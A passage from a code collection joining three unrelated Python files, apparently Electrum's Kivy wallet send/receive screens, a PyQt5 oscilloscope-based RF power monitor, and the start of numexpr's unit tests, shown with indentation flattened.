self.screen.address = pr.get_requestor()
amount = pr.get_amount()
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.screen.message = pr.get_memo()
self.screen.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
raw_tx = tx_from_str(data)
tx = Transaction(raw_tx)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
lower = data.lower()
if lower.startswith('lightning:ln'):
lower = lower[10:]
# try to decode as URI/address
if lower.startswith('ln'):
self.set_ln_invoice(lower)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.screen.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Bitcoin address or a payment request'))
return
if not self.screen.amount:
self.app.show_error(_('Please enter an amount'))
return
try:
amount = self.app.get_amount(self.screen.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.screen.amount)
return
message = self.screen.message
if self.screen.is_lightning:
return {
'type': PR_TYPE_LN,
'invoice': address,
'amount': amount,
'message': message,
}
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Bitcoin Address') + ':\n' + address)
return
outputs = [TxOutput(TYPE_ADDRESS, address, amount)]
return self.app.wallet.create_invoice(outputs, message, self.payment_request, self.parsed_URI)
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice['type'] == PR_TYPE_LN:
self._do_send_lightning(invoice['invoice'], invoice['amount'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs'] # type: List[TxOutput]
amount = sum(map(lambda x: x.value, outputs))
do_pay = lambda rbf: self._do_send_onchain(amount, message, outputs, rbf)
if self.app.electrum_config.get('use_rbf'):
d = Question(_('Should this transaction be replaceable?'), do_pay)
d.open()
else:
do_pay(False)
else:
raise Exception('unknown invoice type')
def _do_send_lightning(self, invoice, amount):
attempts = 10
threading.Thread(target=self.app.wallet.lnworker.pay, args=(invoice, amount, attempts)).start()
def _do_send_onchain(self, amount, message, outputs, rbf):
# make unsigned transaction
coins = self.app.wallet.get_spendable_coins(None)
try:
tx = self.app.wallet.make_unsigned_transaction(coins, outputs, None)
except NotEnoughFunds:
self.app.show_error(_("Not enough funds"))
return
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.app.show_error(repr(e))
return
if rbf:
tx.set_rbf(True)
fee = tx.get_fee()
msg = [
_("Amount to be sent") + ": " + self.app.format_amount_and_units(amount),
_("Mining fee") + ": " + self.app.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.app.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append(_("Additional fees") + ": " + self.app.format_amount_and_units(x_fee_amount))
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
msg.append(_("Enter your PIN code to proceed"))
self.app.protected('\n'.join(msg), self.send_tx, (tx, message))
def send_tx(self, tx, message, password):
if self.app.wallet.has_password() and password is None:
return
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx, self.payment_request)
self.app.wallet.set_label(tx.txid(), message)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
def expiry(self):
return self.app.electrum_config.get('request_expiry', 3600) # 1 hour
def clear(self):
self.screen.address = ''
self.screen.amount = ''
self.screen.message = ''
self.screen.lnaddr = ''
def set_address(self, addr):
self.screen.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.screen.status = ''
if req:
self.screen.message = req.get('memo', '')
amount = req.get('amount')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.screen.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum.util import create_bip21_uri
amount = self.screen.amount
if amount:
a, u = self.screen.amount.split()
assert u == self.app.base_unit
amount = Decimal(a) * pow(10, self.app.decimal_point())
return create_bip21_uri(self.screen.address, amount, self.screen.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.screen.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.screen.message
if lightning:
payment_hash = self.app.wallet.lnworker.add_invoice(amount, message, self.expiry())
request, direction, is_paid = self.app.wallet.lnworker.invoices.get(payment_hash.hex())
key = payment_hash.hex()
else:
addr = self.screen.address or self.app.wallet.get_unused_address()
if not addr:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.screen.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req):
is_lightning = req.get('type') == PR_TYPE_LN
if not is_lightning:
address = req['address']
key = address
else:
key = req['rhash']
address = req['invoice']
amount = req.get('amount')
description = req.get('memo', '')
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description
ci['status'] = get_request_status(req)
ci['is_expired'] = req['status'] == PR_EXPIRED
return ci
def update(self):
if not self.loaded:
return
_list = self.app.wallet.get_sorted_requests()
requests_container = self.screen.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list if item.get('status') != PR_PAID]
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
def clear_requests_dialog(self):
expired = [req for req in self.app.wallet.get_sorted_requests() if req['status'] == PR_EXPIRED]
if len(expired) == 0:
return
def callback(c):
if c:
for req in expired:
is_lightning = req.get('lightning', False)
key = req['rhash'] if is_lightning else req['address']
self.app.wallet.delete_request(key)
self.update()
d = Question(_('Delete expired requests?'), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
cost_power_monitor.py | #!/usr/bin/python3
import sys
import string
import time
import numpy as np
import datetime
from . import ivi
from . import usbtmc
from multiprocessing import Process, Queue, cpu_count
import multiprocessing
from scipy.optimize import leastsq,broyden1
from scipy import stats
from PyQt5 import QtCore
from PyQt5.QtWidgets import *
import pyqtgraph
# importing this after pyqt5 tells pyqtgraph to use qt5 instead of 4
channel_assignment = {1: "nothing", 2: "internal voltage", 3: "current", 4: "nothing"}
sim = False
volcal = 2250
volcal_std = 50
resistance = 4.2961608775
frequency = 13560000
result_queue = Queue(100)
voltage_ref_phase = 0
voltage_ref_phase_std = 0
current_ref_phase = 0
current_ref_phase_std = 0
ref_size = 10 # Number of phase reference points to average over
scope_id = None
def get_scope(scope_id):
"Scope database. Add yours here!"
device = usbtmc.Instrument(scope_id)
idV = device.idVendor
idP = device.idProduct
device.close()
if idV == 0x0957 and idP == 0x175D:
scope = ivi.agilent.agilentMSO7104B(scope_id)
# Lecroy scopes, seems to work for multiple models which send the same idP
# tested for WR8404M, HDO6104A
elif idV == 0x05ff and idP == 0x1023:
scope = ivi.lecroy.lecroyWR8404M(scope_id)
elif idV == 0x0957 and idP == 6042: # York, untested
scope = ivi.agilent.agilentDSOX2004A(scope_id)
else:
scope = ivi.lecroy.lecroyWR8404M(scope_id) # your IVI scope here!
return scope
class QHLine(QFrame):
def __init__(self):
super(QHLine, self).__init__()
self.setFrameShape(QFrame.HLine)
self.setFrameShadow(QFrame.Sunken)
class main_window(QWidget):
def __init__(self):
super().__init__()
l_main_Layout = QHBoxLayout()
this_data_monitor = data_monitor()
this_ctrl_panel = ctrl_panel()
l_main_Layout.addLayout(this_data_monitor)
l_main_Layout.addLayout(this_ctrl_panel)
self.rand_data = np.random.normal(size=100)
self.setLayout(l_main_Layout)
self.setGeometry(300, 300, 1000, 450)
self.setWindowTitle("COST Power Monitor")
self.show()
class data_monitor(QVBoxLayout):
def __init__(self):
super().__init__()
self.results = []
self.tab_bar = QTabWidget()
pyqtgraph.setConfigOption('background', 'w')
pyqtgraph.setConfigOption('foreground', 'k')
self.graph = pyqtgraph.PlotWidget(name='Plot1')
self.graph.setLabel("left","power / W")
self.graph.setLabel("bottom","voltage / V")
self.table = QTableWidget()
self.table.setColumnCount(5)
self.table.setHorizontalHeaderLabels(["Voltage / V", "Current / A",
"Phaseshift / rad", "Power / W", "Time"])
self.tab_bar.addTab(self.table, "Table")
self.tab_bar.addTab(self.graph, "Graph")
self.update_timer = QtCore.QTimer(self)
self.update_timer.setInterval(100)
self.update_timer.timeout.connect(self.update)
self.update_timer.start()
btn_layout = QHBoxLayout()
clear_btn = QPushButton("Clear")
clear_btn.clicked.connect(self.clear_data)
save_btn = QPushButton("Save to Disk")
save_btn.clicked.connect(self.save_data)
copy_btn = QPushButton("Copy to Clipboard")
copy_btn.clicked.connect(self.copy_data)
plot_btn = QPushButton("Plot Data")
plot_btn.clicked.connect(self.update_graph)
btn_layout.addWidget(clear_btn)
btn_layout.addWidget(plot_btn)
btn_layout.addWidget(copy_btn)
btn_layout.addWidget(save_btn)
self.power_dspl = QLabel("0 W")
self.addWidget(self.power_dspl)
self.addWidget(self.tab_bar)
self.addLayout(btn_layout)
def clear_data(self):
global result_queue
result_queue.close()
result_queue = Queue(100)
self.table.setRowCount(0)
self.results = []
def save_data(self):
seperator = "\t "
next_line = " \n"
filename = QFileDialog.getSaveFileName(caption='Save File',
filter='*.txt')
if filename[0]:
phaseshift = (str(voltage_ref_phase - current_ref_phase) + " +- " +
str(voltage_ref_phase_std + current_ref_phase_std))
header = ("## cost-power-monitor file ## \n"+
"# " + str(datetime.datetime.now()) + "\n" +
"# Reference phaseshift: " + phaseshift + "\n" +
"# Calibration factor: " + str(volcal) + "\n" +
"# Channel Settings: " + str(channel_assignment) + "\n\n")
table_header = ("Voltage" + seperator + "Current" + seperator +
"Phaseshift" + seperator + "Power" + seperator + "Time" + next_line)
lines = [header, table_header]
for x in range(self.table.rowCount()):
this_line = ""
for y in range(self.table.columnCount()):
this_line = this_line + str(self.table.item(x,y).text()) + seperator
lines.append(this_line + next_line)
try:
f = open(filename[0], 'w')
f.writelines(lines)
except:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('Could not save file.')
mb.setStandardButtons(QMessageBox.Ok)
mb.exec_()
def copy_data(self):
QApplication.clipboard().setText(np.array2string(np.array(self.results)))
def update(self):
while not result_queue.empty():
new_data = result_queue.get()
if new_data:
self.results.append(new_data)
self.update_table(new_data)
self.update_power_dspl(new_data[-1])
def update_power_dspl(self, power):
self.power_dspl.setText("Power: " + str(round(power,3)) + " W")
def update_graph(self):
"""Updates the Graph with new data,
this data beeing an 2 dim array of voltage and power"""
self.graph.clear()
if self.results:
voltage = np.array(self.results)[:,0]
power = np.array(self.results)[:,3]
self.graph.plot(title="power", x=voltage, y=power, symbol='o')
def update_table(self,data):
"""Updates the table with new data.
Data is array with voltage, current, phaseshift and power"""
#print(data)
self.table.insertRow(self.table.rowCount())
for i,d in enumerate(data):
if i == 2:
r = 10 # round phaseshift very precise
else:
r = 3 # rest to third position after comma
self.table.setItem(self.table.rowCount()-1,i,QTableWidgetItem(str(round(d,r))))
time = datetime.datetime.now().time().strftime("%H:%M:%S")
self.table.setItem(self.table.rowCount()-1,self.table.columnCount()-1,QTableWidgetItem(str(time)))
self.table.scrollToBottom()
class ctrl_panel(QVBoxLayout):
def __init__(self):
super().__init__()
self.tab_bar = QTabWidget()
this_sweep_tab = sweep_tab()
this_settings_tab = settings_tab()
self.tab_bar.addTab(this_sweep_tab, "Sweep")
self.tab_bar.addTab(this_settings_tab, "Settings")
self.addWidget(self.tab_bar)
class sweep_tab(QWidget):
def __init__(self):
""" Don't look at it!"""
super().__init__()
l_main_Layout = QVBoxLayout()
self.sweeping = False
# Power stuff
power_group = QGroupBox()
power_layout = QVBoxLayout()
power_group.setLayout(power_layout)
show_power_row = QHBoxLayout()
show_power_row.addWidget(QLabel("Start/Pause Measurement"))
power_layout.addLayout(show_power_row)
power_btn_row = QHBoxLayout()
power_start_btn = QPushButton("Start")
power_start_btn.clicked.connect(self.start_sweep)
power_stop_btn = QPushButton("Pause")
power_stop_btn.clicked.connect(self.stop_sweep)
power_btn_row.addWidget(power_start_btn)
power_btn_row.addWidget(power_stop_btn)
power_layout.addLayout(power_btn_row)
l_main_Layout.addWidget(power_group)
# Reference stuff
ref_group = QGroupBox()
ref_layout = QVBoxLayout()
ref_group.setLayout(ref_layout)
show_ref_row = QHBoxLayout()
self.ref_label = QLabel("Undef")
show_ref_row.addWidget(QLabel("Reference Phaseshift:"))
show_ref_row.addWidget(self.ref_label)
ref_layout.addLayout(show_ref_row)
ref_btn_row = QHBoxLayout()
ref_start_btn = QPushButton("Find")
ref_start_btn.clicked.connect(self.find_ref)
ref_btn_row.addWidget(ref_start_btn)
ref_layout.addLayout(ref_btn_row)
l_main_Layout.addWidget(ref_group)
self.setLayout(l_main_Layout)
def start_sweep(self):
if not self.sweeping:
self.this_sweep = sweeper(channel_assignment, volcal, voltage_ref_phase, current_ref_phase)
self.this_sweep.start()
self.sweeping = True
def stop_sweep(self):
self.sweeping = False
self.this_sweep.stop()
def find_ref(self):
if not self.sweeping:
global voltage_ref_phase, current_ref_phase, voltage_ref_phase_std, current_ref_phase_std
self.this_sweep = sweeper(channel_assignment, volcal, voltage_ref_phase, current_ref_phase)
voltage_ref_phase, current_ref_phase, voltage_ref_phase_std, current_ref_phase_std = self.this_sweep.find_ref()
self.ref_label.setText(
str(round(voltage_ref_phase - current_ref_phase,10))
+ " ± "
+ str(round(voltage_ref_phase_std + current_ref_phase_std, 10)))
class settings_tab(QWidget):
def __init__(self):
super().__init__()
l_main_Layout = QVBoxLayout()
# list of connected scopes
self.scope_cbox = QComboBox()
self.scope_list()
# UI to select the scope
scope_group = QGroupBox()
scope_layout = QVBoxLayout()
scope_group.setLayout(scope_layout)
scope_sel_row = QHBoxLayout()
scope_info_row = QHBoxLayout()
scope_sel_row.addWidget(QLabel("Oscilloscope"))
scope_sel_row.addWidget(self.scope_cbox)
self.scope_cbox.setCurrentIndex(0)
self.scope_cbox.currentIndexChanged.connect(self.change_scope)
update_btn = QPushButton("Scan")
scope_sel_row.addWidget(update_btn)
self.scope_name = QLabel(" ")
scope_info_row.addWidget(self.scope_name)
self.change_scope()
scope_layout.addLayout(scope_sel_row)
scope_layout.addLayout(scope_info_row)
l_main_Layout.addWidget(scope_group)
l_main_Layout.addWidget(QHLine())
# UI to assign scope channels
chan_group = QGroupBox()
chan_layout = QVBoxLayout()
chan_group.setLayout(chan_layout)
chan_rows = []
for channel_num in range(1,5):
this_channel = channel_settings(channel_num)
chan_rows.append(this_channel)
chan_layout.addLayout(this_channel)
l_main_Layout.addWidget(chan_group)
l_main_Layout.addWidget(QHLine())
# UI to set or find voltage Calibration factor
volcal_group = QGroupBox()
volcal_layout = QVBoxLayout()
volcal_group.setLayout(volcal_layout)
volcal_row = QHBoxLayout()
self.volcal_box = QLineEdit(str(volcal))
self.volcal_box.setMaximumWidth(100)
self.volcal_box.textChanged.connect(self.change_volcal)
self.volcal_std_label = QLabel()
volcal_get = QPushButton("Find")
volcal_get.clicked.connect(self.get_volcal)
volcal_row.addWidget(QLabel("Calibration Factor: "))
volcal_row.addWidget(self.volcal_box)
volcal_row.addWidget(self.volcal_std_label)
volcal_row.addWidget(volcal_get)
volcal_layout.addLayout(volcal_row)
l_main_Layout.addWidget(volcal_group)
self.setLayout(l_main_Layout)
# monitor changes in scopelist
update_btn.clicked.connect(self.scope_list)
def change_scope(self):
global scope_id
idx = self.scope_cbox.currentIndex()
try:
device = self.devices[idx]
scope_id = "USB::%d::%d::INSTR" % (device.idVendor, device.idProduct)
manufacturer = device.manufacturer
product = device.product
except Exception as e:
print(e)
device = None
scope_id = None
manufacturer = ""
product = ""
try:
scope = get_scope(scope_id)
scope.close()
scope_known = True
mark = "✓"
except Exception as e:
print(e)
scope_known = False
mark = "✗"
self.scope_name.setText(mark + " " + manufacturer + " " + product)
def scope_list(self):
# list of connected USB devices
sel_entry = self.scope_cbox.currentText()
devices = usbtmc.list_devices()
dlist = []
for device in devices:
scope_idVendor = device.idVendor
scope_idProduct = device.idProduct
scope_label = (hex(scope_idVendor) + ":" + hex(scope_idProduct))
dlist.append(scope_label)
self.dlist, self.devices = dlist, devices
self.scope_cbox.clear()
self.scope_cbox.addItems(dlist)
idx = self.scope_cbox.findText(sel_entry)
if idx == -1:
try:
self.scope_cbox.setCurrentIndex(0)
except:
pass
else:
self.scope_cbox.setCurrentIndex(idx)
def change_volcal(self):
global volcal
volcal = float(self.volcal_box.text())
def get_volcal(self):
self.this_sweep = sweeper(channel_assignment, volcal, voltage_ref_phase, current_ref_phase)
try:
self.volcal_box.setText(str(round(self.this_sweep.calibrate(),1)))
except Exception as e:
print(e)
if type(volcal_std) == int:
self.volcal_std_label.setText("±" + str(round(volcal_std,1)))
else:
self.volcal_std_label.setText(str(volcal_std))
class channel_settings(QHBoxLayout):
def __init__(self, number):
"""Beware, Channels are numbered 1 to 4"""
super().__init__()
self.number = number
self.addWidget(QLabel("Channel " + str(self.number)))
self.chan_cbox = QComboBox()
chan_options = ["nothing", "internal voltage", "current", "external voltage"]
self.chan_cbox.addItems(chan_options)
self.addWidget(self.chan_cbox)
self.chan_cbox.setCurrentIndex(chan_options.index(channel_assignment[self.number]))
self.chan_cbox.currentIndexChanged.connect(self.change_channel)
def change_channel(self):
global channel_assignment
this_chan_ass = channel_assignment
this_chan_ass[self.number] = self.chan_cbox.currentText()
channel_assignment = this_chan_ass
class sweeper():
def __init__(self, channels, volcal, v_ref, c_ref):
global result_queue
mgr = multiprocessing.Manager()
self.channels = channels
self.volcal = volcal
self.v_ref = v_ref
self.c_ref = c_ref
self.data_queue = mgr.Queue(ref_size)
self.io_process = Process(target=self.io_worker, args=(self.data_queue, scope_id))
self.fit_process_list = []
for i in range(cpu_count()-1):
this_fit_proccess = Process(target=fit_worker,
args=(self.data_queue, result_queue, volcal, v_ref, c_ref))
self.fit_process_list.append(this_fit_proccess)
def start(self):
if not self.io_process.is_alive():
self.io_process.start()
for fit_process in self.fit_process_list:
if not fit_process.is_alive():
fit_process.start()
def stop(self):
if self.io_process.is_alive():
self.io_process.terminate()
for fit_process in self.fit_process_list:
while not self.data_queue.empty() and fit_process.is_alive():
time.sleep(1)
if fit_process.is_alive():
fit_process.terminate()
while not self.data_queue.empty():
self.data_queue.get()
def calibrate(self):
global volcal, volcal_std
ref_queue = Queue(ref_size*2) # Don't ask
self.io_process.start()
volcal_list = []
for i in range(ref_size):
data_dict = self.data_queue.get()
try:
external_voltage_data = data_dict["external voltage"]
except KeyError:
print("Channel 'External Voltage' not set.")
volcal_std = "Error, 'External Voltage' not set."
self.io_process.terminate()
return 0
voltage_data = data_dict["internal voltage"]
v_amp, v_freq, v_phase = fit_func(voltage_data)
ext_v_amp, ext_v_freq, ext_v_phase = fit_func(external_voltage_data)
volcal_list.append(ext_v_amp/v_amp)
self.io_process.terminate()
while not self.data_queue.empty():
self.data_queue.get()
volcal = np.average(volcal_list)
volcal_std = np.std(volcal_list)
return volcal
def find_ref(self):
ref_queue = Queue(ref_size*2) # Don't ask
self.io_process.start()
v_phases = []
c_phases = []
for i in range(ref_size):
data_dict = self.data_queue.get()
voltage_data = data_dict["internal voltage"]
v_amp, v_freq, v_phase = fit_func(voltage_data)
current_data = data_dict["current"]
c_amp, c_freq, c_phase = fit_func(current_data)
v_phases.append(v_phase)
c_phases.append(c_phase)
self.io_process.terminate()
while not self.data_queue.empty():
self.data_queue.get()
# Getting the average of an angle is hard:
# https://en.wikipedia.org/wiki/Mean_of_circular_quantities
mean_v_phase = np.arctan2(
np.sum(np.sin(np.array(v_phases)))/len(v_phases),
np.sum(np.cos(np.array(v_phases)))/len(v_phases)
) % (2*np.pi)
mean_c_phase = np.arctan2(
np.sum(np.sin(np.array(c_phases)))/len(c_phases),
np.sum(np.cos(np.array(c_phases)))/len(c_phases)
) % (2*np.pi)
v_phase_diff_sum = 0
c_phase_diff_sum = 0
for angle in v_phases:
# Next line seems to work. It's all very complicated.
v_phase_diff_sum = (v_phase_diff_sum
+ np.square(np.diff(np.unwrap([angle, mean_v_phase])))[0])
v_phase_std = np.sqrt(v_phase_diff_sum/len(v_phases))
for angle in c_phases:
# Next line seems to work. It's all very complicated.
c_phase_diff_sum = (c_phase_diff_sum
+ np.square(np.diff(np.unwrap([angle, mean_c_phase])))[0])
c_phase_std = np.sqrt(c_phase_diff_sum/len(c_phases))
global voltage_ref_phase, voltage_ref_phase_std
voltage_ref_phase = mean_v_phase
voltage_ref_phase_std = v_phase_std
global current_ref_phase, current_ref_phase_std
current_ref_phase = mean_c_phase
current_ref_phase_std = c_phase_std
self.v_ref = voltage_ref_phase
self.c_ref = current_ref_phase
return (voltage_ref_phase, current_ref_phase, voltage_ref_phase_std, current_ref_phase_std)
def io_worker(self, data_queue, scope_id):
""" Gets waveforms from the scope and puts them into the data_queue."""
device = usbtmc.Instrument(scope_id)
idV = device.idVendor
device.close()
scope = get_scope(scope_id)
while True and not sim:
data_dict = {}
if idV == 0x0957: # Agilent scopes want to be initialized (tested for DSO7104B)
scope.measurement.initiate()
for chan_num in self.channels:
chan_name = self.channels[chan_num]
if chan_name != "nothing":
data_dict[chan_name] = scope.channels[chan_num-1].measurement.fetch_waveform()
data_queue.put(data_dict)
def fit_worker(data_queue, result_queue, volcal, v_ref, c_ref):
"""Takes data_queue and fits a sinus. Returns 4-tuple of voltage,current, phaseshift and power if raw=False,
else a 6 tuple of amp, freq and phase for both voltage and current.
Returns a 2-tuple if cal=True: internal voltage amplitude, external voltage amplitude.
Use num to restict the amount of data the worker should fetech.
Use cal to Calibration internal/external voltage probe"""
while True:
data_dict = data_queue.get()
voltage_data = data_dict["internal voltage"]
v_amp, v_freq, v_phase = fit_func(voltage_data)
voltage_rms = v_amp/np.sqrt(2) * volcal
current_data = data_dict["current"]
c_amp, c_freq, c_phase = fit_func(current_data)
current_rms = c_amp/np.sqrt(2)/resistance
phaseshift = np.pi/2 + (c_ref - c_phase) - (v_ref - v_phase)
power = voltage_rms * current_rms * np.absolute(np.cos(phaseshift))
voltage_rms = v_amp/np.sqrt(2) * volcal
result = (voltage_rms, current_rms, phaseshift, power)
result_queue.put(result)
def fit_func(data):
data = np.array(data)
time = np.nan_to_num(data[:,0])
amplitude = np.nan_to_num(data[:,1])
guess_mean = np.mean(amplitude)
guess_amplitude = np.amax(amplitude)
guess_phase = 0
guess_y0 = 0
guess_frequency = frequency
data_first_guess = (guess_amplitude
*np.sin(time*guess_frequency*2*np.pi + guess_phase%(2*np.pi))
+ guess_mean)
optimize_func = lambda x: (x[0]
*np.sin(time* x[1] * 2*np.pi + x[2]%(2*np.pi))
+ x[3] - amplitude)
solution = leastsq(optimize_func,
[guess_amplitude, guess_frequency, guess_phase, guess_y0],
full_output=0)
est_ampl, est_freq, est_phase, est_y0 = solution[0]
if est_ampl < 0:
est_ampl = np.abs(est_ampl)
est_phase = est_phase + np.pi
return (est_ampl, est_freq, est_phase%(2*np.pi))
def run():
app = QApplication(sys.argv)
this_main_window = main_window()
sys.exit(app.exec_())
|
test_numexpr.py | ###################################################################
# Numexpr - Fast numerical array expression evaluator for NumPy.
#
# License: MIT
# Author: See AUTHORS.txt
#
# See LICENSE.txt and LICENSES/*.txt for details about copyright and
# rights to use.
####################################################################
from __future__ import absolute_import, print_function
import os
import sys
import platform
import warnings
from contextlib import contextmanager
import numpy as np
from numpy import (
array, arange, empty, zeros, int32, int64, uint16, complex_, float64, rec,
copy, ones_like, where, alltrue, linspace,
sum, prod, sqrt, fmod,
sin, cos, tan, arcsin, arccos, arctan, arctan2,
sinh, cosh, tanh, arcsinh, arccosh, arctanh,
log, log1p, log10, exp, expm1, conj)
from numpy.testing import (assert_equal, assert_array_equal,
assert_array_almost_equal, assert_allclose)
from numpy import shape, allclose, array_equal, ravel, isnan, isinf
import numexpr
from numexpr import E, NumExpr, evaluate, disassemble, use_vml
import unittest
TestCase = unittest.TestCase
double = np.double
# Recommended minimum versions
minimum_numpy_version = "1.6"
class test_numexpr(TestCase):
"""Testing with 1 thread"""
nthreads = 1
def setUp(self):
numexpr.set_num_threads(self.nthreads)
def test_simple(self):
ex = 2.0 * E.a + 3.0 * E.b * E.c
sig = [('a', double), ('b', double), ('c', double)]
func = NumExpr(ex, signature=sig)
x = func(array([1., 2, 3]), array([4., 5, 6]), array([7., 8, 9]))
assert_array_equal(x, array([86., 124., 168.]))
def test_simple_expr_small_array(self):
func = NumExpr(E.a)
x = arange(100.0)
y = func(x)
assert_array_equal(x, y)
def test_simple_expr(self):
func = NumExpr(E.a)
x = arange(1e6)
y = func(x)
assert_array_equal(x, y)
def test_rational_expr(self):
func = NumExpr((E.a + 2.0 * E.b) / (1 + E.a + 4 * E.b * E.b))
a = arange(1e6)
b = arange(1e6) * 0.1
x = (a + 2 * b) / (1 + a + 4 * b * b)
y = func(a, b)
assert_array_almost_equal(x, y)
def test_reductions(self):
# Check that they compile OK.
assert_equal(disassemble(
NumExpr("sum(x**2+2, axis=None)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'sum_ddn', b'r0', b't3', None)])
assert_equal(disassemble(
NumExpr("sum(x**2+2, axis=1)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'sum_ddn', b'r0', b't3', 1)])
assert_equal(disassemble(
NumExpr("prod(x**2+2, axis=2)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'prod_ddn', b'r0', b't3', 2)])
# Check that full reductions work.
x = zeros(1e5) + .01 # checks issue #41
assert_allclose(evaluate("sum(x+2,axis=None)"), sum(x + 2, axis=None))
assert_allclose(evaluate("sum(x+2,axis=0)"), sum(x + 2, axis=0))
assert_allclose(evaluate("prod(x,axis=0)"), prod(x, axis=0))
x = arange(10.0)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
x = arange(100.0)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
x = linspace(0.1, 1.0, 2000)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
# Check that reductions along an axis work
y = arange(9.0).reshape(3, 3)
assert_allclose(evaluate("sum(y**2, axis=1)"), sum(y ** 2, axis=1))
assert_allclose(evaluate("sum(y**2, axis=0)"), sum(y ** 2, axis=0))
assert_allclose(evaluate("sum(y**2, axis=None)"), sum(y ** 2, axis=None))
assert_allclose(evaluate("prod(y**2, axis=1)"), prod(y ** 2, axis=1))
assert_allclose(evaluate("prod(y**2, axis=0)"), prod(y ** 2, axis=0))
assert_allclose(evaluate("prod(y**2, axis=None)"), prod(y ** 2, axis=None))
# Check integers
x = arange(10.)
x = x.astype(int)
